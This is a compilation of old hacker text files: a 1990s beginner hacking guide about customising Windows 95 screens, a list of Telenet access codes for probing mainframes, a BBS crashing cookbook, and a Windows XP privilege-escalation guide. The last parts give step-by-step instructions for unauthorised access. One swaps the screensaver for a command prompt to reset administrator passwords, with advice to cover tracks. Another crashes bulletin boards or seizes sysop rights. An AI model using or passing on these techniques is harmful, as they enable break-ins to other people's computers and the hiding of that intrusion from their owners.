on the Web at http://www.FreeSoft.org/Connected/. I can't even begin to
explain to you how wonderful this site is. You just have to try it yourself.
Admittedly it doesn't contain all the RFCs. But it has a tutorial and a
newbie-friendly set of links through the most important RFCs.

Last but not least, you can check out two sites that offer a wealth of
technical information on computer security:

http://csrc.nist.gov/secpubs/rainbow/
http://GAMDALF.ISU.EDU/security/security.html security library

I hope this is enough information to keep you busy studying for the next
five or ten years. But please keep this in mind. Sometimes it's not easy to
figure something out just by reading huge amounts of technical information.
Sometimes it can save you a lot of grief just to ask a question. Even a dumb
question. Hey, how would you like to check out the Web site for those of us
who make our living asking people dumb questions? Surf over to
http://www.scip.org. That's the home page of the Society of Competitive
Information Professionals, the home organization for folks like me. So, go
ahead, make someone's day. Have phun asking those dumb questions. Just
remember to fireproof your phone and computer first!
____________________________________________________________

Read More

Hacking from Windows 95! For NOOBS

____________________________________________________________

Important warning: this is a beginners lesson. BEGINNERS. Will all you super
k-rad elite haxors out there just skip reading this one, instead reading it
and feeling all insulted at how easy it is and then emailing me to bleat
"This GTMHH iz 2 ezy your ****** up,wee hate u!!!&$%" Go study something
that seriously challenges your intellect such as "Unix for Dummies," OK?

Have you ever seen what happens when someone with an America Online account
posts to a hacker news group, email list, or IRC chat session? It gives you
a true understanding of what "flame" means, right?

Now you might think that making fun of dumb.newbie@aol.com is just some
prejudice. Sort of like how managers in big corporations don't wear
dreadlocks and fraternity boys don't drive Yugos.

But the real reason serious hackers would never use AOL is that it doesn't
offer Unix shell accounts for its users. AOL fears Unix because it is the
most fabulous, exciting, powerful, hacker-friendly operating system in the
Solar system... gotta calm down ... anyhow, I'd feel crippled without Unix.
So AOL figures offering Unix shell accounts to its users is begging to get
hacked.

Unfortunately, this attitude is spreading. Every day more ISPs are deciding
to stop offering shell accounts to their users. 

But if you don't have a Unix shell account, you can still hack. All you need
is a computer that runs Windows 95 and just some really retarded on-line
account like America Online or Compuserve.

In this Beginner's Series #2 we cover several fun things to do with Windows
and even the most hacker-hostile Online services. And, remember, all these
things are really easy. You don't need to be a genius. You don't need to be
a computer scientist. You don't need to won an expensive computer. These are
things anyone with Windows 95 can do.

Section One: Customize your Windows 95 visuals. Set up your startup,
background and logoff  screens so as to amaze and befuddle your non-hacker
friends.

Section Two: Subvert Windows nanny programs such as Surfwatch and the setups
many schools use in the hope of keeping kids from using unauthorized
programs. Prove to yourself -- and your friends and coworkers -- that
Windows 95 passwords are a joke.

Section Three: Explore other computers -- OK, let's be blatant -- hack --
from your Windows home computer using even just AOL for Internet access.

HOW TO CUSTOMIZE WINDOWS 95 VISUALS

OK, let's say you are hosting a wild party in your home. You decide to show
your buddies that you are one of those dread hacker d00dz. So you fire up
your computer and what should come up on your screen but the logo for
"Windows 95." It's kind of lame looking, isn't it? Your computer looks just
like everyone else's box. Just like some boring corporate workstation
operated by some guy with an IQ in the 80s.

Now if you are a serious hacker you would be booting up Linux or FreeBSD or
some other kind of Unix on your personal computer. But your friends don't
know that. So you have an opportunity to social engineer them into thinking
you are fabulously elite by just by customizing your bootup screen.

Now let's say you want to boot up with a black screen with orange and yellow
flames and the slogan " K-Rad Doomsters of the Apocalypse." This turns out
to be super easy.

Now Microsoft wants you to advertise their operating system every time you
boot up. In fact, they want this so badly that they have gone to court to
try to force computer retailers to keep the Micro$oft bootup screen on the
systems these vendors sell. 

So Microsoft certainly doesn't want you messing with their bootup screen,
either. So M$ has tried to hide the bootup screen software. But they didn't
hide it very well. We're going to learn today how to totally thwart their plans.

***********************************************
Evil Genius tip: One of the rewarding things about hacking is to find hidden
files that try to keep you from modifying them -- and then to mess with them
anyhow. That's what we're doing today.

The Win95 bootup graphics is hidden in a file named c:\logo.sys. To see this
file, open File Manager, click "view", then click "by file type," then check
the box for "show hidden/system files." Then, back on "view," click "all
file details." To the right of the file logo.sys you will see the letters
"rhs." These mean this file is "read-only, hidden, system." 

The reason this innocuous graphics file is labeled as a system file -- when
it really is just a graphics file -- is because Microsoft is afraid you'll
change it to read something like "Welcome to Windoze 95 -- Breakfast of
Lusers!" So by making it a read-only file, and hiding it, and calling it a
system file as if it were something so darn important it would destroy your
computer if you were to mess with it, Microsoft is trying to trick you into
leaving it alone.
***********************************************

Now here's the easy way to thwart Micro$oft and get the startup logo of your
choice. We start by finding the MSPaint program. It's probably under the
accessories folder. But just in case you're like me and keep on moving
things around, here's the fail-safe program finding routine:

1) Click "Start" on the lower left corner of your screen.
2) Click "Windows Explorer"
3) Click "Tools"
4) Click "Find"
5) Click "files or folders"
6) After "named" type in "MSPaint" 
7) After "Look in" type in 'C:"
8) Check the box that says "include subfolders"
9) Click "find now"
10) Double click on the icon of a paint bucket that turns up in a window.
This loads the paint program.
11) Within the paint program, click "file"
12) Click "open"

OK, now you have MSPaint. Now you have a super easy way to create your new
bootup screen:

13) After "file name" type in c:\windows\logos.sys. This brings up the
graphic you get when your computer is ready to shut down saying "It's now
safe to turn off your computer." This graphic has exactly the right format
to be used for your startup graphic. So you can play with it any way you
want (so long as you don't do anything on the Attributes screen under the
Images menu) and use it for your startup graphic.

14) Now we play with this picture. Just experiment with the controls of
MSPaint and try out fun stuff. 

15) When you decide you really like your picture (fill it with frightening
hacker stuph, right?), save it as c:\logo.sys. This will overwrite the
Windows startup logo file. From now on, any time you want to change your
startup logo, you will be able to both read and write the file logo.sys. 

16. If you want to change the shut down screens, they are easy to find and
modify using MSPaint. The beginning shutdown screen is named
c:\windows\logow.sys. As we saw above, the final  "It's now safe to turn off
your computer" screen graphic is named c:\windows\logos.sys. 

17. To make graphics that will be available for your wallpaper, name them
something like c:\windows\evilhaxor.bmp (substituting your filename for
"exilhaxor" -- unless you like to name your wallpaper "evilhaxor.")

********************************************************
Evil Genius tip: The Microsoft Windows 95 startup screen has an animated bar
at the bottom. But once you replace it with your own graphic, that animation
is gone. However, you can make your own animated startup screen using the
shareware program BMP Wizard. Some download sites for this goodie include:
http://www.pippin.com/English/ComputersSoftware/Software/Windows95/graphic.htm
http://search.windows95.com/apps/editors.html
http://www.windows95.com/apps/editors.html
********************************************************

Now the trouble with using one of the existing Win95 logo files is that they
only allow you to use their original colors. If you really want to go wild,
open MSPaint again. First click "Image," then click "attributes." Set width
320 and height to 400. Make sure under Units that Pels is selected. Now you
are free to use any color combination available in this program. Remember to
save the file as c:\logo.sys for your startup logo, or  c:\windows\logow.sys
and or c:\windows\logos.sys for your shutdown screens.

But if you want some really fabulous stuff for your starting screen, you can
steal graphics from your favorite hacker page on the Web and import them
into Win95's startup and shutdown screens. Here's how you do it.

1) Wow, kewl graphics! Stop your browsing on that Web page and hit the
"print screen" button.

2) Open MSPaint and set width to 320 and height to 400 with units Pels.

3) Click edit, then click paste. Bam, that image is now in your MSPaint program.

4) When you save it, make sure attributes are still 320X400 Pels. Name it
c:\logo.sys, c:\windows\logow.sys, c:\windows\logos.sys, or
c:\winodws\evilhaxor.bmp depending on which screen or wallpaper you want to
display it on.

Of course you can do the same thing by opening any graphics file you choose
in MSPaint or any other graphics program, so long as you save it with the
right file name in the right directory and size it 320X400 Pels.

Oh, no, stuffy Auntie Suzie is coming to visit and she wants to use my
computer to read her email!  I'll never hear the end of it if she sees my
K-Rad Doomsters of the Apocalypse startup screen!!!

Here's what you can do to get your boring Micro$oft startup logo back. Just
change the name of c:logo.sys to something innocuous that Aunt Suzie won't
see while snooping with file manager. Something like logo.bak. Guess what
happens? Those Microsoft guys figured we'd be doing things like this and hid
a copy of their boring bootup screen in a file named "io.sys." So if you
rename or delete their original logo.sys, and there is no file by that name
left, on bootup your computer displays their same old Windows 95 bootup screen.

**************************************
Evil genius tip: Want to mess with io.sys or logo.sys? Here's how to get
into them. And, guess what, this is a great thing to learn in case you ever
need to break into a Windows computer -- something we'll look at in detail
in the next section.

Click "Start" then "Programs" then "MS-DOS." At the MS_DOS prompt enter the
commands:

ATTRIB -R -H -S C:\IO.SYS
ATTRIB -R -H -S C:\LOGO.SYS

Now they are totally at your mercy, muhahaha!
**************************************

OK, that's it for now.  You 31337 hackers who are feeling insulted by
reading this because it was too easy, tough cookies. I warned you. But I'll
bet my box has a happier hacker logon graphic than yours does. K-Rad
Doomsters of the apocalypse, yesss!
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See either
http://www.tacd.com/zines/gtmhh/ or 
http://ra.nilenet.com/~mjl/hacks/codez.htm or
http://www3.ns.sympatico.ca/loukas.halo8/HappyHacker/
Subscribe to our email list by emailing to hacker@techbroker.com with
message "subscribe" or join our Hacker forum at
http://www.infowar.com/cgi-shl/login.exe.
Chat with us on the Happy Hacker IRC channel. If your browser can use Java,
just direct your browser to www.infowar.com, click on chat, and choose the
#hackers channel.
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes?
Send your messages to hacker@techbroker.com.  To send me confidential email
(please, no discussions of illegal activities) use cmeinel@techbroker.com
and be sure to state in your message that you want me to keep this
confidential. If you wish your message posted anonymously, please say so!
Direct flames to dev/null@techbroker.com. Happy hacking! 
Copyright 1997 Carolyn P. Meinel. You may forward  or post on your Web site
this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at
the end..
________________________________________________________

Read More

So you want to be a harmless hacker?

“You mean you can hack without breaking the law?" 

That was the voice of a high school freshman. He had me on the phone because
his father had just taken away his computer. His offense? Cracking into my
Internet account. The boy had hoped to impress me with  how "kewl" he was.
But before I realized he had gotten in, a sysadmin at my ISP had spotted the
kid’s harmless explorations and had alerted the parents. Now the boy wanted
my help in getting back on line.

I told the kid that I sympathized with his father. What if the sysadmin and
I had been major grouches? This kid could have wound up in  juvenile
detention. Now I don’t agree with putting harmless hackers in  jail, and I
would never have testified against him. But that’s what some people do to
folks who go snooping in other people’s computer accounts -- even when the
culprit does no harm. This boy needs to learn how to keep out of trouble!

Hacking is the most exhilarating game on the planet. But it stops being fun
when you end up in a cell with a roommate named "Spike." But hacking doesn't
have to mean breaking laws. In this book we teach safe hacking so that you
don’t have to keep looking back over your shoulders for narcs and cops.

What we're talking about is hacking as a healthy recreation, and as a free
education that can qualify you to get a high paying job. In fact, many
network systems administrators, computer scientists and computer security
experts first learned their professions, not in some college program, but
from the hacker culture. And you may be surprised to discover that
ultimately the Internet is safeguarded not by law enforcement agencies, not
by giant corporations, but by a worldwide network of, yes, hackers.

You, too, can become one of us.

And -- hacking can be surprisingly easy. Heck, if I can do it, anyone can!

Regardless of why you want to be a hacker, it is definitely a way to have
fun, impress your friends, and get dates. If you are a female hacker you
become totally irresistible to men. Take my word for it!;^D

These Guides to (mostly) Harmless Hacking can be your gateway into this
world. After reading just a few of these Guides you will be able to pull off
stunts that will be legal, phun, and will impress the heck out of your friends.

These Guides can equip you to become one of the vigilantes that keeps the
Internet from being destroyed by bad guys. Especially spammers. Heh, heh,
heh. You can also learn how to keep the bad guys from messing with your
Internet account, email, and personal computer. You’ll learn not to be
frightened by silly hoaxes that pranksters use to keep the average Internet
user in a tizzy.

If you hang in with us through a year or so, you can learn enough and meet
the people on our email list and IRC channel who can help you to become
truly elite. 

However, before you plunge into the hacker subculture, be prepared for that
hacker attitude. You have been warned.

So...welcome to the adventure of hacking!

WHAT DO I NEED IN ORDER TO HACK?

You may wonder whether hackers need expensive computer equipment and a shelf
full of technical manuals. The answer is NO! Hacking can be surprisingly
easy! Better yet, if you know how to search the Web, you can find almost any
computer information you need for free.

In fact, hacking is so easy that if you have an on-line service and know how
to send and read email, you can start hacking immediately. The GTMHH
Beginners’ Series #2 will show you where you can download special
hacker-friendly programs for Windows that are absolutely free. And we’ll
show you some easy hacker tricks you can use them for.

Now suppose you want to become an elite hacker? All you will really need is
an inexpensive "shell account" with an Internet Service Provider. In the
GTMHH  Beginners’ Series #3 we will tell you how to get a shell account, log
on, and start playing the greatest game on Earth: Unix hacking! Then in
Vol.s I, II, and III of the GTMHH you can get into Unix hacking seriously.

You can even make it into the ranks of the Uberhackers without loading up on
expensive computer equipment. In Vol. II we introduce Linux, the free
hacker-friendly operating system. It will even run on a 386 PC with just 2
Mb RAM!  Linux is so good that many Internet Service Providers use it to run
their systems. 

In Vol. III we will also introduce Perl, the shell programming language
beloved of Uberhackers. We will even teach some seriously deadly hacker
"exploits" that run on Perl using Linux. OK, you could use most of these
exploits to do illegal things. But they are only illegal if you run them
against someone else’s computer without their permission. You can run any
program in this book on your own computer, or your (consenting) friend’s
computer -- if you dare! Hey, seriously, nothing in this book will actually
hurt your computer, unless you decide to trash it on purpose.

We will also open the gateway to an amazing underground where you can stay
on top of almost every discovery of computer security flaws. You can learn
how to either exploit them -- or defend your computer against them!

About the Guides to (mostly) Harmless Hacking

We have noticed that there are lots of books that glamorize hackers. To read
these books you would think that it takes many years of brilliant work to
become one. Of course we hackers love to perpetuate this myth because it
makes us look so incredibly kewl.

But how many books are out there that tell the beginner step by step how to
actually do this hacking stuph? None! Seriously, have you ever read _Secrets
of a Superhacker_ by The Knightmare (Loomponics, 1994) or _Forbidden Secrets
of the Legion of Doom Hackers_ by Salacious Crumb (St. Mahoun Books, 1994)?
They are full of vague and out of date stuph. Give me a break.

And if you get on one of the hacker news groups on the Internet and ask
people how to do stuph, some of them insult and make fun of you.  OK, they
all make fun of you.

We see many hackers making a big deal of themselves and being mysterious and
refusing to help others learn how to hack. Why? Because they don't want you
to know the truth, which is that most of what they are doing is really very
simple!

Well, we thought about this. We, too, could enjoy the pleasure of insulting
people who ask us how to hack. Or we could get big egos by actually teaching
thousands of people how to hack. Muhahaha.

How to Use the Guides to (mostly) Harmless Hacking

If you know how to use a personal computer and are on the Internet, you
already know enough to start learning to be a hacker. You don't even need to
read every single Guide to (mostly) Harmless Hacking in order to become a
hacker.

You can count on anything in Volumes I, II and III being so easy that you
can jump in about anywhere and just follow instructions. 

But if your plan is to become "elite," you will do better if you read all
the Guides, check out the many Web sites and newsgroups to which we will
point you, and find a mentor among the many talented hackers who post to our
Hackers forum or chat on our IRC server at http://www.infowar.com, and on
the Happy Hacker email list (email hacker@techbroker.com with message
“subscribe”).

If your goal is to become an Uberhacker, the Guides will end up being only
the first in a mountain of material that you will need to study. However, we
offer a study strategy that can aid you in your quest to reach the pinnacle
of hacking.

How to Not Get Busted

One slight problem with hacking is that if you step over the line, you can
go to jail. We will do our best to warn you when we describe hacks that
could get you into trouble with the law. But we are not attorneys or experts
on cyberlaw.  In addition, every state and every country has its own laws.
And these laws keep on changing. So you have to use a little sense.

However, we have a Guide to (mostly) Harmless Hacking Computer Crime Law
Series to help you avoid some pitfalls.

But the best protection against getting busted is the Golden Rule. If you
are about to do something that you would not like to have done to you,
forget it. Do hacks that make the world a better place, or that are at least
fun and harmless, and you should be able to keep out of trouble.

So if you get an idea from the Guides to (mostly) Harmless Hacking that
helps you to do something malicious or destructive, it's your problem if you
end up being the next hacker behind bars.  Hey, the law won't care if the
guy whose computer you trash was being a d***. It won't care that the giant
corporation whose database you filched shafted your best buddy once. They
will only care that you broke the law.

To some people it may sound like phun to become a national sensation in the
latest hysteria over Evil Genius hackers. But after the trial, when some
reader of these Guides ends up being the reluctant "girlfriend" of a convict
named Spike, how happy will his news clippings make him? 

Conventions Used in the Guides

You've probably already noticed that we spell some words funny, like "kewl"
and "phun." These are hacker slang terms. Since we often communicate with
each other via email, most of our slang consists of ordinary words with
extraordinary spellings. For example, a hacker might spell "elite" as
"3l1t3," with 3's substituting for e's and 1's for i's. He or she may even
spell "elite" as "31337. The Guides sometimes use these slang spellings to
help you learn how to write email like a hacker.

Of course, the cute spelling stuph we use will go out of date fast. So we do
not guarantee that if you use this slang, people will read your email and
think, "Ohhh, you must be an Evil Genius! I'm sooo impressed!"  

Take it from us, guys who need to keep on inventing new slang to prove they
are "k-rad 3l1t3" are often lusers and lamers. So if you don't want to use
any of the hacker slang of this book, that's OK by us. Most Uberhackers
don't use slang, either.

Who Are You?

We've made some assumptions about who you are and why you are reading these
Guides:

· You own a PC or Macintosh personal computer 
· You are on-line with the Internet
· You have a sense of humor and adventure and want to express it by hacking
· Or -- you want to impress your friends and pick up chicks (or guys) by
making them think you are an Evil Genius

So, does this picture fit you? If so, OK, d00dz, start your computers. Are
you ready to hack?

_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See either
http://www.vcalpha.com/silicon/void-f.html or
http://www3.ns.sympatico.ca/loukas.halo8/HappyHacker/
http://www.geocities.com/TimesSquare/Arcade/4594

We have a discussion group and archives hosted at
http://www.infowar.com/cgi-shl/login.exe.

Chat with us on the Happy Hacker IRC channel. If your browser can use Java,
just direct your browser to www.infowar.com, click on chat, and choose the
#hackers channel.

Subscribe to our email list by emailing to hacker@techbroker.com with
message "subscribe"

Want to share some kewl stuph with the Happy Hacker list? Correct mistakes?
Send your messages to hacker@techbroker.com.  To send me confidential email
(please, no discussions of illegal activities) use carolyn@techbroker.com
and be sure to state in your message that you want me to keep this
confidential. If you wish your message posted anonymously, please say so!
Direct flames to dev/null@techbroker.com. Happy hacking! 
Copyright 1997 Carolyn P. Meinel. You may forward  or post on your Web site
this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at
the end..
________________________________________________________
Carolyn Meinel
M/B Research -- The Technology Brokers

Read More

HACKING TELENET

For Those Who Like Living Dangerously:

These are Telenet access codes. Telenet is a system by which one can
access almost every data-base and mainframe on the continantal U.S.
Most of these codes do not have passwords with them, so you will have to
hack those out yourselves.  But be weary.  M ore than one group of
hackers have gotten busted for using this system for hacking into
mainfraimes.  An example is the 414's.  If you read about them in
newsweek, it's pretty scary.

What to do-
  The first thing you have to do if you want to hack with Telenet, is
find your local Telenet phone number. This can be done many ways.  One
way that always works, is to call up your local computer store, tell
them that you recently purchased The Source o r something like that, but
that you lost the sheet that has the phone # writen on it.  They'll tell
it to you.  (People who work in computer stores usualy aren't very smart
about that sort of thing. (No offence White Eagle.))

Call the number with your computer.  Once connection is established,
press <RETURN> twice. the computer will display "TERMINAL=" Type
<RETURN> again.  The computer will then display an at sign: ""  Type in
the access code here.   Happy Hacking!

Access Codes
------ -----

C 20120 - VM 370 ONLINE
C 20124N- NEW YORK TIME INFORMATION SERVICE
C 20125 - NJIT ELECTRONIC INFORMATION
C 20130
C 20133
C 20138
C 20148
C 20154
C 20165
C 20166
C 20167 - WARNER COMPUTER SYSTEMS
C 20168 - WARNER COMPUTER SYSTEMS
C 20171
C 20182 - BANKERS TRUST CUSTOMER SERVICE
C 20184
C 20222
C 20225 - COMSHARE "COMMANDER II"
C 20246
C 20247 - GSD TIMESHARING
C 20270 - GSD TIMESHARING
C 202124- GENERAL MOTORS WARREN
C 202133
C 202138- (TYPE .HELP *)
C 202139- (TYPE .HELP *)
C 202140- (TYPE .HELP *)
C 202143
C 202144- (TYPE .HELP *)
C 202148
C 202149
C 202175 - HONEYWELL
C 202222 - GM PARTS
C 202229 - PRIMENET
C 20321  - WYLBUR
C 21221  - PRIMENET
C 21224  - PRIMENET
C 21225  - INTERACTIVE MARKET SYSTEMS
C 21226  - INTERACTIVE MARKET SYSTEMS
C 21228  - BURROUGHS NYC DATA CENTER
C 21229  - LANDART SYSTEMS
C 21231  - E.F.HUTTON
C 21233  - UNIVAC 1100
C 21247
C 21248
C 21252
C 21253  - VM/370 ONLINE
C 21256  - CITIBANK CASH MANAGER
C 21264  - CITICASH MANAGER INTERNATIONAL
C 21265  - CITICASH MANAGER INTERNATIONAL
C 21269
C 21281  - BANKERS TRUST CUSTOMER SERVICE
C 21284  - DATAMOR TIME SHARING
C 21288  - S-K WDC SYSTEM 1/ONLINE
C 212136 - (TYPE NEW/TSC)
C 212141
C 212142
C 212151 - CITICASH MANAGER INTERNATIONAL
C 212152
C 21255  - PRIMENET
C 21256  - PRIMENET
C 212160 - TELSTAT SIGMA 6
C 212167 - RSTS V.7.0-07
C 212168 - RSTS V.7.0-07
C 212171
C 212172
C 21284  - DATAMOR TIME SHARING
C 21325  - PRIMENET
C 21335  - MARKETRON RESEARCH AND SALES
C 21336  - MARKETRON RESEARCH AND SALES
C 21341
C 21360
C 21365
C 21366
C 213170 - DIALOG
C 21370  - XCC-WEST SYSTEM X2
C 21371  - XCC-WEST SYSTEM X3
C 21372  - XCC-WEST SYSTEM X3
C 21373  - XCC-WEST SYSTEM X1
C 21375  - XCC-WEST SYSTEM X2
C 21379  - INTERACTIVE SYSTEM/ONE
C 21384
C 21385
C 21386  - IAS PROGRAM DEVELOPMENT SYSTEM
C 21388
C 213105
C 21520  - TPF&C ONLINE
C 21534  - PRIMENET
C 21538
C 21722
C 21725
C 21726  - U OF I COMPUTING SERVICES
C 30121  - NASA RECON
C 30124  - SOURCE SYSTEM 10
C 30126  - DISTRIBUTIVE NETWORK
C 30128  - SOURCE SYSTEM 13
C 30134  - INTERACTIVE(GAITHERSBURG)
C 30135
C 30136
C 30138  - SOURCE SYSTEM 11
C 30147  - SOURCE SYSTEM 12
C 30148  - SOURCE SYSTEM 15
C 30149  - SOURCE SYSTEM 14
C 30320  - COMPUTER SHARING SERVICES
C 30330  - COMPUTER SHARING SERVICES
C 30335
C 30337  - PRIMENET
C 30339  - PRIMENET
C 30340  - PRIMENET
C 303125
C 30520
C 30522
C 30531
C 30532  - C.S.I. TIMESHARING SERVICE
C 30523  - C.S.I. TIMESHARING SERVICE
C 31231  - C.I.C. TIMESHARING
C 31232
C 31235
C 31236
C 31240
C 31247
C 31248
C 31249
C 31250
C 31254
C 31279
C 31289
C 312124
C 312127
C 31325
C 31327
C 31340  - ADP NETWORK
C 31341  - ADP NETWORK
C 31345  - PRIMENET
C 31359  - GENERAL MOTORS WARREN
C 31360  - GENERAL MOTORS WARREN
C 31361  - GM PARTS
C 31363  - VM/370 ONLINE
C 31370  - GM DECSYSTEM-20 TIMESHARING
C 31422
C 31423
C 31424  - MCAUTO VM/370 ONLINE
C 31425  - MCAUTO VM/370 ONLINE
C 31426
C 31432
C 31435  - PRIMENET
C 31444
C 31726  - RSTS V06C-04
C 40420
C 40434
C 40822
C 41520 - DIALOG
C 41527 - STANFORD IBM-3033A
C 41548 - DIALOG
C 41556
C 41560
C 41561
C 41562
C 41567
C 41580  - HARPER GROUP INFORMATION NETWORK
C 41587  - BUSSIPLEXER
C 51632
C 51633
C 51634
C 51638
C 51646
C 51647  - VM/370 ONLINE
C 51729
C 60320  - DARTMOUTH COLLEGE COMPUTING
C 60322
C 60324
C 60328
C 60331
C 60720
C 60942
C 60945
C 61114
C 61115
C 61118
C 61120
C 61221
C 61724
C 61735  - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL
C 61748  - PRIMENET
C 61750  - PRIMENET
C 61760  - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL
C 61766  - PRIMENET
C 61767  - PRIMENET
C 61770  - NDC-SYSTEM#
C 61774
C 61776  - NDC-SYSTEM#
C 61777  - NDC-SYSTEM#
C 61778  - PRIMENET
C 617120
C 617121
C 617124
C 617125
C 617127
C 617133
C 617135 - VM/370 ONLINE
C 61737  - VM/370 ONLINE
C 617138 - MASSACHUSETTS INSTITUE OF
C 617139 - MASSACHUSETTS INSTITUE OF
C 617140 - VM/370 ONLINE
C 617151
C 617152
C 617159
C 61763
C 61769  - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK
C 61770  - BPL-INFORONICS
C 617171 - INTERACT LINE
C 617177 - ERT ENVIRONET
C 617178
C 617179 - ERT ENVIRONET
C 61780  - (TYPE HELP)
C 71424  - GLOBAL DATA TIMESHARING
C 71431  - (TYPE HELP)
C 71620  - UNION CARBIDE
C 80331
C 80423  - CONTROL DATA INTERCOM
C 80424  - CONTROL DATA INTERCOM
C 80426  - BABCOCK AND WILCOX
C 81623
C 81625  - UNINET
C 81626  - UNINET
C 90995D - TELENET NEWS SERVICE
C 91930
C 91931
C 91933
C 91934


Telemail
--------

To use the Telemail feature of Telenet, type mail at the "" prompt.
User id's are usually the first initial of the user's first name, plus
the last name.

   IE.
       William Smith= WSMITH

This system is lot's of fun.


Send any additions/corrections to the Flash via E-Mail. Seeyaround!

           -=O
           -=I
          -=<I<.
           -=I
          -=/ >
         -=/./.

Read More

BBS CRASHING TECHNIQUES [:=:]

- File Formatted for 80 columns like it or not -

 To start off with, I'd just like to say this file is a collectithe
 latest BBS crashes. Many people have grudges and reasons to 'crash' a bbs,
 well this file is served as an aid to them and also to sysops who want to
 prevent their own bbs' from being attacked. And that's enuff talk for now,
 let's get on with the good stuff (everything is in cookbook format for speedy
 reading).


[-=:  Apple Net :=-]


1. Post a message (can be bbs,feedback,newuser etc.)
2. Press space bar util you get to the very last line (40th col.)
3. type ctrl-D
4. (after the word wrap to next line) Type any dos command (Preferrably FP)
5. get into editor ('/E')
6. list the program
7. You should be in basic or executing whatever dos command you entered


Requirements:

- Must have wordwrap activated
- 40 columns mode should be activated
- Their must be a (L)ist command in the editor


[-=: Telecat 2.x & 3.0 :=-]


 2.x
-----


1. Go to the board section
2. Newscan the last board accessable
3. After the first message, type 'B' at the prompt (To jump to next board)


Results:

- If it was the last board on the bbs, chances arethat will break into Basic
- If not, then it will go on to the next board (which is handy and surpassess
  the security level crap)

 3.0
-----


1. Post Message
2. Type a line of text
3. type ctrl-V 


Results:

- This should either hang the system or break into basic
- It is trying to center the line but it fucks up

[-=: GBBS Pro :=-]

Method 1:

1. Go the the editor
2. Hold down tab key
3. or press space and type ctrl-C

Method 2:

1. Upload to a full volume

Method 3:

1. read the userlist
2. hang up when it gets to the Sysop
3. call back and log on and you'll be a sysop

[-=: Proving Grounds :=-]

Method 1:

1. (On older versions) Enter decimal or negative numbers

Method 2:

1. Call board and enter the user number of a Remote sysop
2. Enter any bs for a pw
3. Do the same thing again (more garbage the 2nd time it asks)
4. Now enter your real number and pass
5. At the first input prompt type 'Remote'
6. This should give you the Remote Sysop menu and access

Notes:

- Using Sysop's user# will give you 10 extra minutes on system
- The second method works only on unmoded newer versions of Proving Grounds

Ok, well that about wraps it up. Remember, all these crashes work only on
unmoded boards (which are on the most part run by leeches and geeks).

If you have any questions or more tips for Vol.2 then leave me mail on
Halifax 20megs (301)445/5897  or  Eastern Alliance 10megs (201)327/5725
and where else you see me. Both are fine boards. Have Fun!

[-------------<THE BAND>--------------]
Mistywood BBS/AE/CF........818/335-5651
Mistywood // BBS...........602/220-9363
The Wizards Guild..........409/696-8226
Den o/Crude Tort...........617/832-9229
Sirius Cybernetics.........808/528-2436
[-------------------------------------]


DOWNLOADED FROM P-80 SYSTEMS.....

Read More

How to hack Windows XP Admin Passwords the easy way

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:

When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.

Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.

This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Windows XP Home and Pro.

-----------------------------------------------------------------------------

Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)

-----------------------------------------------------------------------------

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

-----------------------------------------------------------------------------

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user <admin account name here> password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Any updates, Errors, Suggestions or just general comments mail them to either

Read More